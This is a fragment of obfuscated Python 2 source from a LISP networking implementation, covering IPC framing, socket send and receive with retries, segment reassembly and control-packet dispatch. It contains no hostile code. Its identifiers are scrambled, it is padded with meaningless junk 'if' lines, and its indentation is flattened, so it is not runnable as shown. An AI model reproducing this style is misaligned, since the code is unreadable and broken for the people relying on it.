if 43 - 43: iIii1I11I1II1 + ooOoO0o * iII111i + iIii1I11I1II1 . I1Ii111
def lisp_packet_ipc ( packet , source , sport ) :
return ( ( "packet@" + str ( len ( packet ) ) + "@" + source + "@" + str ( sport ) + "@" + packet ) )
if 87 - 87: I1Ii111
if 47 - 47: II111iiii + I1IiiI . Oo0Ooo / iIii1I11I1II1
if 14 - 14: i1IIi / OoO0O00 / iII111i % I1Ii111
if 72 - 72: OoO0O00 . II111iiii - IiII + IiII + iIii1I11I1II1 % oO0o
if 21 - 21: iII111i + OoOoOO00 - i11iIiiIii % O0 + OOooOOo
if 30 - 30: o0oOOo0O0Ooo - Oo0Ooo + iII111i / O0
if 94 - 94: IiII
if 69 - 69: I1Ii111 . I1Ii111
if 53 - 53: i11iIiiIii + iII111i * Oo0Ooo - I1Ii111
def lisp_control_packet_ipc ( packet , source , dest , dport ) :
return ( "control-packet@" + dest + "@" + str ( dport ) + "@" + packet )
if 61 - 61: o0oOOo0O0Ooo / OOooOOo . II111iiii - I1IiiI * i11iIiiIii
if 8 - 8: iII111i % o0oOOo0O0Ooo
if 87 - 87: Ii1I % I11i / I1Ii111
if 21 - 21: OoO0O00 + Ii1I / I1Ii111
if 75 - 75: I1Ii111 . Ii1I % iIii1I11I1II1 / OoOoOO00
if 38 - 38: i1IIi
if 1 - 1: I1ii11iIi11i + OoO0O00 % I11i . OOooOOo + i1IIi / oO0o
def lisp_data_packet_ipc ( packet , source ) :
return ( "data-packet@" + str ( len ( packet ) ) + "@" + source + "@@" + packet )
if 35 - 35: ooOoO0o % OoOoOO00 % OoO0O00 + OOooOOo / IiII * OoOoOO00
if 65 - 65: I1IiiI . Oo0Ooo + i1IIi - Ii1I * i1IIi
if 64 - 64: I1IiiI / OoO0O00 * I1IiiI * II111iiii . Ii1I
if 98 - 98: I1Ii111 + o0oOOo0O0Ooo
if 73 - 73: I1ii11iIi11i / I1Ii111 + i11iIiiIii + OoO0O00 . ooOoO0o
if 54 - 54: I1ii11iIi11i + IiII - oO0o + Oo0Ooo / IiII % Oo0Ooo
if 2 - 2: OOooOOo / I11i * I11i + I11i / O0 - OOooOOo
if 29 - 29: OoOoOO00 + i11iIiiIii % OoO0O00 - OoooooooOO
if 68 - 68: iII111i / OOooOOo
def lisp_command_ipc ( packet , source ) :
return ( "command@" + str ( len ( packet ) ) + "@" + source + "@@" + packet )
if 28 - 28: II111iiii
if 49 - 49: I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 72 - 72: I1ii11iIi11i * i11iIiiIii
if 12 - 12: O0 - iIii1I11I1II1 % Oo0Ooo / O0 - IiII
if 55 - 55: OOooOOo . Oo0Ooo * OoOoOO00 / OoooooooOO * i11iIiiIii + oO0o
if 45 - 45: Ii1I
if 8 - 8: oO0o + OOooOOo
if 37 - 37: IiII - OoOoOO00 + oO0o - Oo0Ooo + IiII
def lisp_api_ipc ( source , data ) :
return ( "api@" + str ( len ( data ) ) + "@" + source + "@@" + data )
if 33 - 33: Oo0Ooo % oO0o - I1IiiI + Oo0Ooo
if 90 - 90: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1 % IiII * I1Ii111 . I1Ii111
if 90 - 90: o0oOOo0O0Ooo - O0 % O0 - oO0o . OoooooooOO
if 30 - 30: I11i + O0 / Ii1I / OoOoOO00 - oO0o + II111iiii
if 21 - 21: iIii1I11I1II1 % OoooooooOO * OOooOOo % i1IIi
if 73 - 73: OoooooooOO
if 100 - 100: I11i / i1IIi / i1IIi % Ii1I - II111iiii . OoooooooOO
if 72 - 72: Oo0Ooo * OoooooooOO % I1IiiI + I11i - II111iiii
if 82 - 82: iIii1I11I1II1 / i1IIi * I1IiiI . i11iIiiIii
def lisp_ipc ( packet , send_socket , node ) :
if 56 - 56: Ii1I * I1IiiI / ooOoO0o * II111iiii
if 51 - 51: i1IIi . oO0o % OOooOOo
if 90 - 90: OoooooooOO + iII111i / iIii1I11I1II1
if 12 - 12: OoooooooOO
if ( lisp_is_running ( node ) == False ) :
lprint ( "Suppress sending IPC to {}" . format ( node ) )
return
if 9 - 9: O0 / O0 / I1IiiI - oO0o . ooOoO0o
if 6 - 6: O0 - OoO0O00 + OoooooooOO % iIii1I11I1II1
Ooo0oOO0oOo0 = 1500 if ( packet . find ( "control-packet" ) == - 1 ) else 9000
if 89 - 89: ooOoO0o + I11i * O0 % OoOoOO00
OoO00oo00 = 0
IiiI1iii1iIiiI = len ( packet )
I1iiI1ii1i = 0
O0IIiIi = .001
while ( IiiI1iii1iIiiI > 0 ) :
O0OO0O = min ( IiiI1iii1iIiiI , Ooo0oOO0oOo0 )
o00o = packet [ OoO00oo00 : O0OO0O + OoO00oo00 ]
if 40 - 40: ooOoO0o - O0 - IiII - Ii1I % IiII / Ii1I
try :
send_socket . sendto ( o00o , node )
lprint ( "Send IPC {}-out-of-{} byte to {} succeeded" . format ( len ( o00o ) , len ( packet ) , node ) )
if 98 - 98: Ii1I * Oo0Ooo - O0 % OoOoOO00 + I1ii11iIi11i . II111iiii
I1iiI1ii1i = 0
O0IIiIi = .001
if 92 - 92: Oo0Ooo * IiII - Ii1I . OoOoOO00 / iIii1I11I1II1 . OOooOOo
except socket . error , oOo :
if ( I1iiI1ii1i == 12 ) :
lprint ( "Giving up on {}, consider it down" . format ( node ) )
break
if 53 - 53: i11iIiiIii
if 50 - 50: i11iIiiIii / i1IIi + i1IIi / Ii1I . o0oOOo0O0Ooo + OoOoOO00
lprint ( "Send IPC {}-out-of-{} byte to {} failed: {}" . format ( len ( o00o ) , len ( packet ) , node , oOo ) )
if 29 - 29: I1ii11iIi11i % OOooOOo - I1IiiI / iII111i % OoOoOO00
if 15 - 15: o0oOOo0O0Ooo / OOooOOo % I1IiiI - I1IiiI / i1IIi * Ii1I
I1iiI1ii1i += 1
time . sleep ( O0IIiIi )
if 90 - 90: ooOoO0o % o0oOOo0O0Ooo * Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo * OoOoOO00
lprint ( "Retrying after {} ms ..." . format ( O0IIiIi * 1000 ) )
O0IIiIi *= 2
continue
if 40 - 40: iIii1I11I1II1 - i11iIiiIii / i1IIi / II111iiii
if 37 - 37: Ii1I + o0oOOo0O0Ooo
OoO00oo00 += O0OO0O
IiiI1iii1iIiiI -= O0OO0O
if 74 - 74: Oo0Ooo / O0 + i1IIi . I1IiiI + OoO0O00 / Oo0Ooo
return
if 13 - 13: o0oOOo0O0Ooo / Ii1I . II111iiii
if 8 - 8: I11i - I11i % IiII
if 8 - 8: I1IiiI . IiII * O0 * o0oOOo0O0Ooo
if 17 - 17: I1IiiI . oO0o + Oo0Ooo + I11i / o0oOOo0O0Ooo
if 25 - 25: iII111i / iII111i % OoOoOO00 / ooOoO0o
if 81 - 81: OOooOOo * oO0o
if 32 - 32: Oo0Ooo * OoO0O00 + ooOoO0o . O0 * oO0o * iIii1I11I1II1
def lisp_format_packet ( packet ) :
packet = binascii . hexlify ( packet )
OoO00oo00 = 0
O0OOOo000 = ""
IiiI1iii1iIiiI = len ( packet ) * 2
while ( OoO00oo00 < IiiI1iii1iIiiI ) :
O0OOOo000 += packet [ OoO00oo00 : OoO00oo00 + 8 ] + " "
OoO00oo00 += 8
IiiI1iii1iIiiI -= 4
if 50 - 50: i1IIi
return ( O0OOOo000 )
if 53 - 53: II111iiii + O0 . ooOoO0o * IiII + i1IIi
if 80 - 80: Ii1I + O0
if 59 - 59: i11iIiiIii - OoooooooOO % I11i . OoO0O00 - Oo0Ooo * o0oOOo0O0Ooo
if 7 - 7: II111iiii % Ii1I * i11iIiiIii
if 28 - 28: II111iiii / ooOoO0o * i11iIiiIii % OOooOOo
if 18 - 18: I11i - IiII - iIii1I11I1II1
if 82 - 82: II111iiii + OoO0O00 % iIii1I11I1II1 / O0
def lisp_send ( lisp_sockets , dest , port , packet ) :
O0OOOoooO000 = lisp_sockets [ 0 ] if dest . is_ipv4 ( ) else lisp_sockets [ 1 ]
if 72 - 72: ooOoO0o
if 21 - 21: Ii1I - OOooOOo
if 32 - 32: iIii1I11I1II1 / OoO0O00
if 22 - 22: II111iiii . I11i
if 61 - 61: OOooOOo % O0 . I1ii11iIi11i . iIii1I11I1II1 * I11i
if 29 - 29: ooOoO0o + i1IIi % IiII * Ii1I
if 94 - 94: OOooOOo / IiII
if 18 - 18: IiII - I11i / Ii1I % IiII * i1IIi
if 22 - 22: OoOoOO00 - Oo0Ooo
if 41 - 41: iIii1I11I1II1 * I1Ii111 / OoO0O00
if 33 - 33: I11i + O0
if 9 - 9: I11i . iII111i * ooOoO0o * ooOoO0o
ii1i1II11II1i = dest . print_address_no_iid ( )
if ( ii1i1II11II1i . find ( "::ffff:" ) != - 1 and ii1i1II11II1i . count ( "." ) == 3 ) :
if ( lisp_i_am_rtr ) : O0OOOoooO000 = lisp_sockets [ 0 ]
if ( O0OOOoooO000 == None ) :
O0OOOoooO000 = lisp_sockets [ 0 ]
ii1i1II11II1i = ii1i1II11II1i . split ( "::ffff:" ) [ - 1 ]
if 68 - 68: O0 - i11iIiiIii % iIii1I11I1II1 % ooOoO0o
if 12 - 12: II111iiii + I11i
if 9 - 9: I1ii11iIi11i
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Send" , False ) ,
len ( packet ) , bold ( "to " + ii1i1II11II1i , False ) , port ,
lisp_format_packet ( packet ) ) )
if 51 - 51: I1ii11iIi11i
if 37 - 37: I1IiiI % I1Ii111
if 22 - 22: o0oOOo0O0Ooo % OOooOOo - I11i + ooOoO0o / OOooOOo
if 98 - 98: I11i * O0 + IiII - oO0o
ii11Ii11IIIII = ( LISP_RLOC_PROBE_TTL == 128 )
if ( ii11Ii11IIIII ) :
iI1i11II = struct . unpack ( "B" , packet [ 0 ] ) [ 0 ]
ii11Ii11IIIII = ( iI1i11II in [ 0x12 , 0x28 ] )
if ( ii11Ii11IIIII ) : lisp_set_ttl ( O0OOOoooO000 , LISP_RLOC_PROBE_TTL )
if 7 - 7: OOooOOo % iIii1I11I1II1
if 11 - 11: OoooooooOO % OoOoOO00 * I11i % i11iIiiIii * i11iIiiIii
try : O0OOOoooO000 . sendto ( packet , ( ii1i1II11II1i , port ) )
except socket . error , oOo :
lprint ( "socket.sendto() failed: {}" . format ( oOo ) )
if 25 - 25: oO0o . OoO0O00 % Ii1I % Ii1I
if 94 - 94: iII111i . Ii1I
if 71 - 71: o0oOOo0O0Ooo * II111iiii / OOooOOo . OoO0O00
if 73 - 73: I1Ii111 * OoO0O00 / OoOoOO00 . II111iiii
if 87 - 87: OoO0O00 + Oo0Ooo + O0 % OoooooooOO - iIii1I11I1II1
if ( ii11Ii11IIIII ) : lisp_set_ttl ( O0OOOoooO000 , 64 )
return
if 100 - 100: Oo0Ooo + IiII
if 81 - 81: iIii1I11I1II1 + iIii1I11I1II1
if 19 - 19: ooOoO0o + i1IIi / Oo0Ooo * II111iiii * I1Ii111 / ooOoO0o
if 23 - 23: I1Ii111
if 76 - 76: Ii1I + Ii1I / i1IIi % o0oOOo0O0Ooo . iIii1I11I1II1 . OoOoOO00
if 75 - 75: I11i . Ii1I / I1ii11iIi11i
if 99 - 99: Ii1I
if 85 - 85: I1Ii111 + I1Ii111 + OoOoOO00 / ooOoO0o / o0oOOo0O0Ooo . Oo0Ooo
def lisp_receive_segments ( lisp_socket , packet , source , total_length ) :
if 41 - 41: i1IIi % Ii1I . i1IIi * OoooooooOO % Ii1I
if 21 - 21: iII111i
if 72 - 72: I11i % o0oOOo0O0Ooo . iIii1I11I1II1 - I1Ii111 / i11iIiiIii
if 75 - 75: OoooooooOO
if 24 - 24: oO0o % iII111i - II111iiii / Ii1I + O0
O0OO0O = total_length - len ( packet )
if ( O0OO0O == 0 ) : return ( [ True , packet ] )
if 37 - 37: I1Ii111 - i1IIi / iIii1I11I1II1
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( packet ) ,
total_length , source ) )
if 53 - 53: Ii1I - iIii1I11I1II1 % I1ii11iIi11i * i11iIiiIii + ooOoO0o
if 63 - 63: Oo0Ooo * I1IiiI
if 84 - 84: Oo0Ooo
if 67 - 67: oO0o / II111iiii . I11i / oO0o
if 46 - 46: oO0o * Oo0Ooo - I11i / iIii1I11I1II1
IiiI1iii1iIiiI = O0OO0O
while ( IiiI1iii1iIiiI > 0 ) :
try : o00o = lisp_socket . recvfrom ( 9000 )
except : return ( [ False , None ] )
if 100 - 100: i11iIiiIii % oO0o
o00o = o00o [ 0 ]
if 62 - 62: OOooOOo * i1IIi - OOooOOo / i11iIiiIii
if 17 - 17: I1ii11iIi11i + ooOoO0o % Ii1I % OOooOOo
if 73 - 73: i11iIiiIii
if 44 - 44: o0oOOo0O0Ooo % Ii1I - OoOoOO00 + OoOoOO00 * IiII + iII111i
if 58 - 58: I1ii11iIi11i / oO0o + i11iIiiIii * o0oOOo0O0Ooo
if ( o00o . find ( "packet@" ) == 0 ) :
iiiI1i1 = o00o . split ( "@" )
lprint ( "Received new message ({}-out-of-{}) while receiving " + "fragments, old message discarded" , len ( o00o ) ,
# ooOoO0o - i1IIi
iiiI1i1 [ 1 ] if len ( iiiI1i1 ) > 2 else "?" )
return ( [ False , o00o ] )
if 61 - 61: II111iiii * I1ii11iIi11i / I11i / OoO0O00
if 44 - 44: O0 + OoOoOO00 . iIii1I11I1II1 . IiII
IiiI1iii1iIiiI -= len ( o00o )
packet += o00o
if 2 - 2: iII111i
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( o00o ) , total_length , source ) )
if 47 - 47: i1IIi % I11i
if 17 - 17: OoOoOO00 - iII111i % I11i / o0oOOo0O0Ooo / II111iiii
return ( [ True , packet ] )
if 22 - 22: Oo0Ooo + I1ii11iIi11i % i11iIiiIii . OoO0O00 - I11i % I11i
if 21 - 21: I1IiiI . OoO0O00 * IiII % OoooooooOO - Oo0Ooo + Oo0Ooo
if 94 - 94: ooOoO0o
if 80 - 80: i11iIiiIii - O0 / I1Ii111 + OOooOOo % Oo0Ooo
if 95 - 95: II111iiii
if 76 - 76: OoO0O00 % iII111i * OoOoOO00 / ooOoO0o / i1IIi
if 45 - 45: Ii1I . I11i * I1Ii111 . i11iIiiIii
if 34 - 34: O0 * o0oOOo0O0Ooo / IiII
def lisp_bit_stuff ( payload ) :
lprint ( "Bit-stuffing, found {} segments" . format ( len ( payload ) ) )
IiiiIi1iiii11 = ""
for o00o in payload : IiiiIi1iiii11 += o00o + "\x40"
return ( IiiiIi1iiii11 [ : - 1 ] )
if 75 - 75: I1Ii111 - i1IIi - OoO0O00
if 25 - 25: iII111i . o0oOOo0O0Ooo
if 62 - 62: I11i + i1IIi . I1ii11iIi11i - I1ii11iIi11i
if 68 - 68: ooOoO0o % OoooooooOO
if 94 - 94: Oo0Ooo * o0oOOo0O0Ooo
if 60 - 60: iII111i . OOooOOo
if 39 - 39: O0 - i11iIiiIii - I1IiiI / Oo0Ooo - i11iIiiIii
if 30 - 30: OoO0O00 / OoOoOO00 + I1ii11iIi11i % IiII - OoO0O00
if 19 - 19: I1IiiI
if 99 - 99: OOooOOo - OOooOOo
if 98 - 98: o0oOOo0O0Ooo + O0 * oO0o - i11iIiiIii
if 83 - 83: o0oOOo0O0Ooo
if 23 - 23: o0oOOo0O0Ooo . I11i
if 67 - 67: iII111i
if 52 - 52: IiII . OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / IiII . OoooooooOO . Oo0Ooo / ooOoO0o + O0
if 38 - 38: I11i
if 66 - 66: II111iiii
if 57 - 57: OoO0O00 / Oo0Ooo % I1IiiI * I1ii11iIi11i
if 68 - 68: iII111i - o0oOOo0O0Ooo - OoO0O00 . O0 - i11iIiiIii
def lisp_receive ( lisp_socket , internal ) :
while ( True ) :
if 2 - 2: I1ii11iIi11i * i1IIi
if 17 - 17: I1ii11iIi11i * Ii1I % Oo0Ooo * I1Ii111 + OoO0O00 . OoooooooOO
if 60 - 60: Ii1I . II111iiii
if 36 - 36: IiII . iII111i * O0 . i1IIi * O0 * I1Ii111
try : IiIIIi = lisp_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
if 70 - 70: I1Ii111 * I11i % oO0o % ooOoO0o * iII111i - I1Ii111
if 43 - 43: iIii1I11I1II1 . i11iIiiIii - oO0o
if 55 - 55: iIii1I11I1II1 % oO0o % OOooOOo / I1Ii111 * OoooooooOO / Oo0Ooo
if 88 - 88: I11i + OoO0O00 . iIii1I11I1II1 . II111iiii
if 67 - 67: OOooOOo - ooOoO0o % iII111i % IiII
if 71 - 71: OoO0O00 - ooOoO0o - I1IiiI + O0
if ( internal == False ) :
IiiiIi1iiii11 = IiIIIi [ 0 ]
i1IIi1ii1i1ii = lisp_convert_6to4 ( IiIIIi [ 1 ] [ 0 ] )
Oo0O00O = IiIIIi [ 1 ] [ 1 ]
if 15 - 15: i1IIi
if ( Oo0O00O == LISP_DATA_PORT ) :
Iii1Ii = lisp_data_plane_logging
IiIiI1 = lisp_format_packet ( IiiiIi1iiii11 [ 0 : 60 ] ) + " ..."
else :
Iii1Ii = True
IiIiI1 = lisp_format_packet ( IiiiIi1iiii11 )
if 26 - 26: i1IIi - I1IiiI + IiII / OoO0O00 . I1ii11iIi11i
if 82 - 82: I1Ii111 % iII111i . OoOoOO00 % OoO0O00 + I1ii11iIi11i
if ( Iii1Ii ) :
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Receive" ,
False ) , len ( IiiiIi1iiii11 ) , bold ( "from " + i1IIi1ii1i1ii , False ) , Oo0O00O ,
IiIiI1 ) )
if 69 - 69: I1IiiI * OoOoOO00 - ooOoO0o . O0
return ( [ "packet" , i1IIi1ii1i1ii , Oo0O00O , IiiiIi1iiii11 ] )
if 15 - 15: oO0o . IiII + I1Ii111 - OoooooooOO
if 85 - 85: II111iiii - Oo0Ooo + oO0o . i11iIiiIii + Oo0Ooo
if 86 - 86: ooOoO0o . OoO0O00
if 47 - 47: IiII % I1IiiI
if 91 - 91: Ii1I
if 69 - 69: iII111i
oO0OO0oOo00 = False
i1I = IiIIIi [ 0 ]
OOOoOoOO0oo = False
if 37 - 37: i1IIi * iIii1I11I1II1 % OoooooooOO . OoooooooOO / Oo0Ooo % i11iIiiIii
while ( oO0OO0oOo00 == False ) :
i1I = i1I . split ( "@" )
if 53 - 53: oO0o - IiII - iIii1I11I1II1 + O0 * Ii1I
if ( len ( i1I ) < 4 ) :
lprint ( "Possible fragment (length {}), from old message, " + "discarding" , len ( i1I [ 0 ] ) )
if 1 - 1: i1IIi % O0 / I11i
OOOoOoOO0oo = True
break
if 52 - 52: I1IiiI + oO0o * II111iiii
if 15 - 15: I11i
oo0i11i11ii11 = i1I [ 0 ]
try :
i1i1I1II1i = int ( i1I [ 1 ] )
except :
o0o = bold ( "Internal packet reassembly error" , False )
lprint ( "{}: {}" . format ( o0o , IiIIIi ) )
OOOoOoOO0oo = True
break
if 10 - 10: IiII * o0oOOo0O0Ooo * o0oOOo0O0Ooo
i1IIi1ii1i1ii = i1I [ 2 ]
Oo0O00O = i1I [ 3 ]
if 66 - 66: I1ii11iIi11i % I1IiiI . I1IiiI * Ii1I + OoO0O00 % i1IIi
if 34 - 34: II111iiii + I1IiiI * i1IIi . I11i
if 51 - 51: I11i . iII111i * I1IiiI . iIii1I11I1II1 % I1IiiI / O0
if 47 - 47: OoooooooOO - i11iIiiIii . I1IiiI / i1IIi
if 74 - 74: OoooooooOO * ooOoO0o
if 45 - 45: Oo0Ooo + iIii1I11I1II1 . o0oOOo0O0Ooo
if 50 - 50: o0oOOo0O0Ooo % O0
if 67 - 67: OoOoOO00
if ( len ( i1I ) > 5 ) :
IiiiIi1iiii11 = lisp_bit_stuff ( i1I [ 4 : : ] )
else :
IiiiIi1iiii11 = i1I [ 4 ]
if 21 - 21: I11i % Oo0Ooo + Oo0Ooo / iIii1I11I1II1 % iIii1I11I1II1
if 66 - 66: iII111i
if 72 - 72: ooOoO0o / oO0o / iII111i . I1Ii111 . I1ii11iIi11i + IiII
if 39 - 39: I1IiiI % I1Ii111
if 22 - 22: OoOoOO00 - OOooOOo % i1IIi + i1IIi
if 28 - 28: oO0o + OoOoOO00 * Ii1I . I11i
oO0OO0oOo00 , IiiiIi1iiii11 = lisp_receive_segments ( lisp_socket , IiiiIi1iiii11 ,
i1IIi1ii1i1ii , i1i1I1II1i )
if ( IiiiIi1iiii11 == None ) : return ( [ "" , "" , "" , "" ] )
if 80 - 80: I1ii11iIi11i / OoOoOO00
if 74 - 74: I1ii11iIi11i + O0 + o0oOOo0O0Ooo - iII111i
if 48 - 48: ooOoO0o * iIii1I11I1II1 % Oo0Ooo
if 60 - 60: OoOoOO00 / i1IIi * iIii1I11I1II1
if 91 - 91: I1Ii111 . OoooooooOO / IiII / I1IiiI
if ( oO0OO0oOo00 == False ) :
i1I = IiiiIi1iiii11
continue
if 56 - 56: II111iiii + iIii1I11I1II1 / I1Ii111 / I1Ii111 % Oo0Ooo / OoOoOO00
if 46 - 46: i11iIiiIii + OoO0O00 . ooOoO0o + OoO0O00 % i11iIiiIii
if ( Oo0O00O == "" ) : Oo0O00O = "no-port"
if ( oo0i11i11ii11 == "command" and lisp_i_am_core == False ) :
ooo = IiiiIi1iiii11 . find ( " {" )
oo00o00OoO = IiiiIi1iiii11 if ooo == - 1 else IiiiIi1iiii11 [ : ooo ]
oo00o00OoO = ": '" + oo00o00OoO + "'"
else :
oo00o00OoO = ""
if 93 - 93: IiII - OoOoOO00 - Ii1I % II111iiii . I1ii11iIi11i % OoooooooOO
if 2 - 2: oO0o % ooOoO0o
lprint ( "{} {} bytes {} {}, {}{}" . format ( bold ( "Receive" , False ) ,
len ( IiiiIi1iiii11 ) , bold ( "from " + i1IIi1ii1i1ii , False ) , Oo0O00O , oo0i11i11ii11 ,
oo00o00OoO if ( oo0i11i11ii11 in [ "command" , "api" ] ) else ": ... " if ( oo0i11i11ii11 == "data-packet" ) else ": " + lisp_format_packet ( IiiiIi1iiii11 ) ) )
if 44 - 44: Ii1I
if 91 - 91: i11iIiiIii * Oo0Ooo / i1IIi
if 19 - 19: i1IIi * I1IiiI
if 82 - 82: I1ii11iIi11i * iIii1I11I1II1
if 53 - 53: OoO0O00 * O0
if ( OOOoOoOO0oo ) : continue
return ( [ oo0i11i11ii11 , i1IIi1ii1i1ii , Oo0O00O , IiiiIi1iiii11 ] )
if 97 - 97: Oo0Ooo . i1IIi
if 56 - 56: Ii1I
if 2 - 2: i1IIi % oO0o + O0 - OoO0O00
if 34 - 34: ooOoO0o + oO0o - Oo0Ooo
if 94 - 94: OoOoOO00 - Ii1I
if 93 - 93: OoooooooOO * OOooOOo
if 34 - 34: OoOoOO00 + OoOoOO00 - Oo0Ooo
if 21 - 21: i1IIi + O0 % I1ii11iIi11i / i1IIi - iII111i
def lisp_parse_packet ( lisp_sockets , packet , source , udp_sport , ttl = - 1 ) :
O0o00oOo0 = False
oooooo0ooo0O = time . time ( )
if 16 - 16: ooOoO0o
O0ooOoO0 = lisp_control_header ( )
if ( O0ooOoO0 . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return ( O0o00oOo0 )
if 61 - 61: IiII
if 53 - 53: Oo0Ooo % iII111i % iII111i
if 71 - 71: iII111i
if 99 - 99: O0 - OoOoOO00 * I1Ii111 - Oo0Ooo
if 62 - 62: i1IIi + ooOoO0o + Oo0Ooo - i11iIiiIii
ii1i = source
if ( source . find ( "lisp" ) == - 1 ) :
IiII1iiI = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
IiII1iiI . string_to_afi ( source )
IiII1iiI . store_address ( source )
source = IiII1iiI
if 51 - 51: ooOoO0o - I1Ii111 * oO0o
if 47 - 47: Oo0Ooo % OoO0O00 * Ii1I / OoOoOO00
if ( O0ooOoO0 . type == LISP_MAP_REQUEST ) :
lisp_process_map_request ( lisp_sockets , packet , None , 0 , source ,
udp_sport , False , ttl , oooooo0ooo0O )
if 1 - 1: I1IiiI
elif ( O0ooOoO0 . type == LISP_MAP_REPLY ) :
lisp_process_map_reply ( lisp_sockets , packet , source , ttl , oooooo0ooo0O )
if 68 - 68: ooOoO0o
elif ( O0ooOoO0 . type == LISP_MAP_REGISTER ) :
lisp_process_map_register ( lisp_sockets , packet , source , udp_sport )
if 68 - 68: I11i % IiII
elif ( O0ooOoO0 . type == LISP_MAP_NOTIFY ) :
if ( ii1i == "lisp-etr" ) :
lisp_process_multicast_map_notify ( packet , source )
else :
if ( lisp_is_running ( "lisp-rtr" ) ) :
lisp_process_multicast_map_notify ( packet , source )
if 1 - 1: I1IiiI + OOooOOo - OOooOOo * O0 + o0oOOo0O0Ooo * OOooOOo
lisp_process_map_notify ( lisp_sockets , packet , source )
if 48 - 48: ooOoO0o - iII111i + I1ii11iIi11i * I1Ii111 % ooOoO0o * OoO0O00
if 28 - 28: i1IIi / iII111i + OOooOOo
elif ( O0ooOoO0 . type == LISP_MAP_NOTIFY_ACK ) :
lisp_process_map_notify_ack ( packet , source )
if 89 - 89: Oo0Ooo + II111iiii * OoO0O00 + Oo0Ooo % II111iiii
elif ( O0ooOoO0 . type == LISP_MAP_REFERRAL ) :
lisp_process_map_referral ( lisp_sockets , packet , source )
if 59 - 59: O0 + Oo0Ooo
elif ( O0ooOoO0 . type == LISP_NAT_INFO and O0ooOoO0 . is_info_reply ( ) ) :
O0O , IIIi1i1iIIIi , O0o00oOo0 = lisp_process_info_reply ( source , packet , True )
if 63 - 63: OoO0O00 / I1IiiI / oO0o . Ii1I / i1IIi
elif ( O0ooOoO0 . type == LISP_NAT_INFO and O0ooOoO0 . is_info_reply ( ) == False ) :
oo0o00OO = source . print_address_no_iid ( )
lisp_process_info_request ( lisp_sockets , packet , oo0o00OO , udp_sport ,
None )
if 50 - 50: I11i . I11i % I1IiiI - i1IIi
elif ( O0ooOoO0 . type == LISP_ECM ) :
lisp_process_ecm ( lisp_sockets , packet , source , udp_sport )
if 63 - 63: OoO0O00 . iII111i
else :
lprint ( "Invalid LISP control packet type {}" . format ( O0ooOoO0 . type ) )
if 28 - 28: ooOoO0o . Oo0Ooo - OoooooooOO - I1Ii111 - OoooooooOO - oO0o
return ( O0o00oOo0 )
if 25 - 25: I11i / I1Ii111 . i11iIiiIii % i1IIi
if 21 - 21: O0 * IiII . iII111i / iII111i % i11iIiiIii / I11i
if 15 - 15: o0oOOo0O0Ooo / OoO0O00 - i1IIi
if 30 - 30: OoO0O00 / ooOoO0o % ooOoO0o
if 40 - 40: i1IIi . iIii1I11I1II1 * OoOoOO00
if 83 - 83: iIii1I11I1II1 + Ii1I - Ii1I % II111iiii
if 82 - 82: O0
def lisp_process_rloc_probe_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp ) :
if 18 - 18: iII111i . IiII . I1IiiI
oo00ooOOOo0O = bold ( "RLOC-probe" , False )
if 40 - 40: IiII / oO0o + OoooooooOO / iII111i / II111iiii + i1IIi
if ( lisp_i_am_etr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( oo00ooOOOo0O ) )
lisp_etr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp )
return
if 33 - 33: I11i + I1ii11iIi11i + i11iIiiIii * I1IiiI % oO0o % OoooooooOO
if 4 - 4: OoO0O00 . I1IiiI - O0 % iII111i . OOooOOo
if ( lisp_i_am_rtr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( oo00ooOOOo0O ) )
lisp_rtr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp )
return
if 69 - 69: OoooooooOO
if 19 - 19: O0 + iIii1I11I1II1 / OoOoOO00 / oO0o + II111iiii - OOooOOo
lprint ( "Ignoring received {} Map-Request, not an ETR or RTR" . format ( oo00ooOOOo0O ) )
return
if 70 - 70: i1IIi * o0oOOo0O0Ooo + I1Ii111 . ooOoO0o - O0 + i11iIiiIii
if 81 - 81: iIii1I11I1II1 - OoO0O00 . i11iIiiIii
if 4 - 4: o0oOOo0O0Ooo / OoO0O00 - I11i
if 52 - 52: II111iiii . iII111i
if 36 - 36: I1IiiI * II111iiii
def lisp_process_smr ( map_request ) :
lprint ( "Received SMR-based Map-Request" )
return
if 68 - 68: oO0o * o0oOOo0O0Ooo + OoooooooOO - I1ii11iIi11i * i1IIi % OOooOOo
if 39 - 39: I1Ii111 / I11i + oO0o / I1Ii111 % IiII * I1ii11iIi11i
if 66 - 66: I1ii11iIi11i * ooOoO0o . i11iIiiIii * Oo0Ooo - I11i . I1IiiI
if 43 - 43: I11i . iII111i . IiII - oO0o
if 60 - 60: i1IIi + iII111i * i1IIi . iII111i
def lisp_process_smr_invoked_request ( map_request ) :
lprint ( "Received SMR-invoked Map-Request" )
return
if 40 - 40: i1IIi . OoO0O00
if 65 - 65: Oo0Ooo
if 81 - 81: OOooOOo % OoooooooOO / IiII . Oo0Ooo - ooOoO0o . I1IiiI
if 3 - 3: O0
if 95 - 95: i11iIiiIii
if 100 - 100: iIii1I11I1II1 * I1IiiI * Ii1I * i1IIi . I1Ii111 * I1IiiI
if 54 - 54: o0oOOo0O0Ooo / iII111i + IiII - o0oOOo0O0Ooo - I11i
def lisp_build_map_reply ( eid , group , rloc_set , nonce , action , ttl , map_request ,
keys , enc , auth , mr_ttl = - 1 ) :
if 28 - 28: I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo * IiII + OoooooooOO
o0O0oO0OOOOO0 = map_request . rloc_probe if ( map_request != None ) else False
iiO0O0oOO0O0 = map_request . json_telemetry if ( map_request != None ) else None
if 77 - 77: I11i / iII111i * o0oOOo0O0Ooo % iIii1I11I1II1
if 26 - 26: i1IIi / OoO0O00 / IiII
oO00OoO0O0O = lisp_map_reply ( )
